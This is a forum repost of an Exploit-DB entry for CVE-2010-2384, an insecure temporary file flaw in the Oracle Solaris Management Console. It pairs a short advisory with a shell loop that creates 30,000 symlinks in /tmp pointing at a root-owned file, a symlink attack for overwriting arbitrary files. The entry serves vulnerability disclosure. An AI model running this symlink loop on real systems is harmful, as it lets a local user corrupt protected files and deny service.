Exploit Oracle Solaris Management Console - WBEM Insecure Temporary File Creation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34314
Проверка EDB
  1. Пройдено
Автор
FRANK STUART
Тип уязвимости
LOCAL
Платформа
SOLARIS
CVE
cve-2010-2384
Дата публикации
2010-07-13
Oracle Solaris Management Console - WBEM Insecure Temporary File Creation
Код:
source: https://www.securityfocus.com/bid/41642/info

The 'Solaris Management Console' sub component of Oracle Solaris creates temporary files in an insecure manner.

An attacker with local access can exploit this issue to overwrite arbitrary files. This may result in denial-of-service conditions or could aid in other attacks.

Solaris 9 and 10 are affected.

   $ id
   uid=101(fstuart) gid=14(sysadmin)
   $ cd /tmp
   $ x=0
   $ while [ "$x" -ne 30000 ] ;do
   > ln -s /etc/important /tmp/dummy.$x
   > x=$(expr "$x" + 1)
   > done
   $ ls -dl /etc/important
   -rw-r--r--   1 root     root          38 Jan  3 22:43 /etc/important
   $ cat /etc/important
      This is an important file!

      EOF
 
Источник
www.exploit-db.com

Похожие темы